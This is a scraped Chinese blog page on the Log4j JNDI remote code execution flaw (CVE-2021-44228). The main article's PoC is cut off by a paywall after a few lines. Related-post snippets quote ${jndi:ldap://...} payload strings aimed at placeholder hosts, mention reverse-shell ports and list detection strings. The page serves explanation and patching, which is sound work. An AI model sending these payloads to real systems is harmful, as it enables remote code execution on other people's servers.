Log4j远程代码执行

zkzq

已于 2022-03-01 15:58:43 修改

阅读量1.5k

点赞数

CC 4.0 BY-SA版权

文章标签： web安全渗透测试网络安全

于 2022-02-25 14:36:03 首次发布

本文链接：https://blog.youkuaiyun.com/hackzkaq/article/details/123132199

本文深入分析了Log4j的远程代码执行漏洞，探讨了漏洞的触发条件，通过查看官方文档和调试过程，揭示了利用JNDI注入实现远程类加载的原理。总结了漏洞的关键在于对`${}`格式化字符串的支持，导致了安全问题。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

零基础学黑客，搜索公众号：白帽子左一

作者：掌控安全——holic

0x01、环境

Jdk7u21（随便版本都可以）

影响版本：

Apache Log4j 2.x
org.apache.logging.log4j
log4j-core
2.11.1

Poc

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
public class test2 {
   
   
    private static Logger LOGGER = LogManager.getLogger();
    public static void ma

最低0.47元/天解锁文章

200万优质内容无限畅学

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

zkzq

关注关注

0
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

Log4j远程代码执行漏洞复现尝试

weixin_51194266的博客

06-29

705

log4j漏洞的简单复现

Apache log4j远程代码执行漏洞复现

qq_46162550的博客

05-11

1957

Apache log4j远程代码执行漏洞复现（1）漏洞原理：（2）漏洞复现环境：（3）漏洞复现过程：（1）漏洞原理： Apache Log4j2 中存在JNDI注入漏洞，当程序将用户输入的数据进行日志记录时，即当log4j打印的日志内容中包含${jndi:ldap://my-ip}时，lookup会将jndi注入可执行语句执行，程序会通过ldap协议访问my-ip这个地址，然后my-ip就会返回一个包含java代码的class文件的地址，然后程序再通过返回的地址下载class文件并执行，从而达成漏

参与评论您还未登录，请先登录后发表或查看评论

log4j2远程代码执行

2302_79885863的博客

05-26

1164

漏洞，黑客可以恶意构造特殊数据请求包，触发此漏洞，从而成功利用此漏洞可以在目标服务器上执行任意代码。注意，此漏洞是可以执行任意代码，这就很恐怖，相当于黑客已经攻入计算机，可以为所欲为了，就像已经进入你家，想干什么，就干什么，比如运行什么程序，植入什么病毒。通过访问那个域名网站之后，它的这个服务器后面会去做一个映射，如果这个网站存在这个漏洞，那么它就会访问这个网站，只要一访问这个网站它就会得到网站的ip地址，说明我的服务器解析了这个代码，说明那个我的这个网站存在这个漏洞。

log4j 远程执行代码CVE-2021-44228复现

beichenyyds的博客

03-02

4055

0x01 漏洞简述 2021年12月09日，360CERT监测发现Apache Log4j 2存在JNDI远程代码执行，漏洞等级：严重，漏洞评分：10.0。 Apache Log4j 2是一个开源的日志记录组件，使用非常的广泛，使用情况参考： https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core/usages 对此，360CERT建议广大用户尽快将·Apache Log4j 2进行升级，以免遭受黑客攻击。

Java代码审计——apache log4j 远程命令执行（CVE-2021-44228）

王嘟嘟的博客

12-13

2134

0x00 前言反序列化总纲本来是快乐游戏时间的，但是突然就出来这个洞了= =，当然这个突然用的比较夸张了，修复时间应该是在五天前了。本着学习的态度来进行一下简单的分析。 0x01 环境首先是pom <dependencies> <dependency> <groupId>org.apache.logging.log4j</groupId> <artifactId>lo

Apache Log4j2 远程代码执行漏洞 2.15.0(CVE-2021-44228)

weixin_44047654的博客

01-09

3521

Apache Log4j2 远程代码执行漏洞< 2.15.0(CVE-2021-44228)

Apache Log4j 远程代码执行漏洞(CVE-2021-44832)

10-25

Apache Log4j 是一个广泛使用的 Java 日志框架，它允许应用...总之，Apache Log4j 远程代码执行漏洞是一个重大安全事件，强调了在软件开发和运维过程中对安全性的重视。及时更新和维护软件库是防止此类漏洞影响的关键。

解决Apache Log4j 远程代码执行漏洞log4j2部分jar

12-10

解决Apache Log4j 远程代码执行漏洞log4j2部分jar，包含log4j-1.2-api-2.15.0.jar，log4j-api-2.15.0.jar，log4j-core-2.15.0.jar，log4j-to-slf4j-2.15.0.jar

Apache Log4j2 远程代码执行漏洞检测工具

12-15

针对这个漏洞，开发出了专门的Apache Log4j2远程代码执行漏洞检测工具，这些工具包括针对Windows和Linux操作系统的版本。这些工具的主要目的是帮助管理员和安全专家迅速识别其环境中是否存在易受攻击的Log4j2实例。 ...

p36273的博客

09-16

1616

上面第2、3、4、5步都是在攻击者端操作，只有第6步是在普通前端操作。上面一共开启了3个端口，分别是80、1234、9999。这分别对应的是：web服务、接收反弹shell的、ldap服务。------ Log4j2漏洞总的来说就是：因为Log4j2默认支持解析ldap/rmi协议（只要打印的日志中包括ldap/rmi协议即可），并会通过名称从ldap服务端其获取对应的Class文件，并使用ClassLoader在本地加载Ldap服务端返回的Class类。

logging-log4j2-log4j-2.15.0-rc2.zip maven 资源库

12-31

针对Log4j 2 远程代码执行漏洞，需要用到的升级资源包，适用于maven资源库，包括log4j，log4j-core，log4j-api，log4j-1.2-api，log4j-jpa等全套2.15.0 maven资源库jar包。如果是maven本地仓库使用，需要将zip包解压到maven资源库的/org/apache/logging/log4j下 log4j严重漏洞 log4j logging-log4j2-log4j-2.15.0-rc2 log4j-1.2-api-2.15.0.jar log4j-api-2.15.0.jar log4j-core-2.15.0.jar log4j-slf4j-impl-2.15.0.jar log4j-web-2.15.0.jar

Log4j 的远程代码执行漏洞

weilaona的博客

12-17

1121

Log4j 的远程代码执行漏洞 12 月 10 日凌晨，Apache 开源项目 Log4j 的远程代码执行漏洞细节被公开，由于 Log4j 的广泛使用，该漏洞一旦被攻击者利用会造成严重危害。受本次漏洞影响的版本范围为 Apache Log4j 2.x < 2.15.0-rc2，攻击者可以利用此漏洞在目标服务器上执行任意代码，通过 JNDI 来执行 LDAP 协议来注入一些非法的可执行代码。攻击检测（1）可以通过检查日志中是否存在 “jndi:ldap://”、“jndi:rmi” 等字符来发现可能

Log4j远程代码执行漏洞

04-14

797

遇到问题可以先看注意事项！！！

Apache存在Log4j远程代码执行漏洞，严重危险级别

Mr、温少的博客

12-20

602

Apache存在Log4j远程代码执行漏洞，严重危险级别！文章目录Apache存在Log4j远程代码执行漏洞，严重危险级别！漏洞简述 2021-12-09，近期一个 Apache Log4j 远程代码执行漏洞细节被公开，攻击者利用漏洞可以远程执行代码。如果你的系统日志使用log4j实现，且版本大于 2.0，日志打印内容中包含关键字 ${}，其包含的内容会当做变量来进行替换，导致攻击者可以任意执行命令。（问题出在：1og4j-core.jar）影响范围 Apache Log4j2 是一款优秀的

log4j反序列化远程命令执行以及个人原理理解

weixin_46626737的博客

08-11

451

目录服务是一个特殊的数据库，用来保存描述性的、基于属性的详细信息，支持过滤功能。${jndi:ldap:x.x.x.x/test.class},通过构造的这条恶意函数，发送到log4j，打印到日志中，开始解析{}中的内容，发现是ldap实现的jndi，然后调用lookup。功能去查找x.x.x.x/test.class该文件，然后发现是远程服务器的文件，需要通过codebase去下载该class类，然后下载后，对该class文件进行使用默认的构造器。类似于上一个漏洞的原理。

CVE-2021-44228Log4j2远程代码执行漏洞复现

hcja666的博客

03-12

904

Log4j2（Log for Java）是apache基金会的一个用于 Java 应用程序的成熟且功能强大的日志记录框架。其作用主要体现在能帮助开发者方便地记录程序运行中的各种信息，如调试信息、业务操作记录、错误信息等，便于快速定位和解决问题，同时也有助于对系统运行状况进行监控和分析。

使用 Log4j 将日志记录到远程系统

java、c++、机器学习方向King

05-16

658

https://coyee.com/article/12131-direct-logs-to-remote-system-with-log4j?utm_source=tuicool&utm_medium=referral 使用logstash分布式日志架构也可以，或者使用下面的方法日志是在程序开发中最为重要的信息。日志为我们提供程序执行的行为记录。 Log4j 是 Java 程序里

log4j2远程代码执行漏洞原理及复现

m0_57967573的博客

04-29

2017

log4j2 框架下的 lookup 查询服务提供了 {} 字段解析功能，传进去的值会被直接解析。例如 ${java:version} 会被替换为对应的 java 版本。这样如果不对 lookup 的出栈进行限制，就有可能让查询指向任何服务

Log4j2.x 远程代码执行漏洞对线上项目（Log4j2.x）有影响吗？

詹Sir的博客

12-24

2197

突然，用户一封邮件袭击而来。只知道Log4j问题大了，也没去想自己的项目有没有影响。这下不得不去校验一番了。执行测试代码如下： /** * @Description Log4J 漏洞测试 * @Author 开源字节 */ public class Log4jTest { private static final Logger logger = LogManager.getLogger(Log4jTest.class); public static void main(

log4j远程代码执行漏洞

06-01

log4j远程代码执行漏洞是一种安全漏洞，可以允许攻击者远程执行恶意代码。该漏洞影响Apache软件基金会的Java日志库Log4j 2.x版本，并由于其被广泛使用而引起了广泛的关注。攻击者可以通过精心构造的日志消息来触发该漏洞，从而远程执行任意代码。该漏洞已被评为最高危险性的漏洞之一，并在全球范围内引起了广泛的警惕。如果您正在使用Log4j 2.x版本，请及时更新到最新版本，并考虑禁用JNDI查找以帮助保护您的系统免受此漏洞的影响。同时，您也可以使用其他Java日志库来替代Log4j，以降低系统受攻击的风险。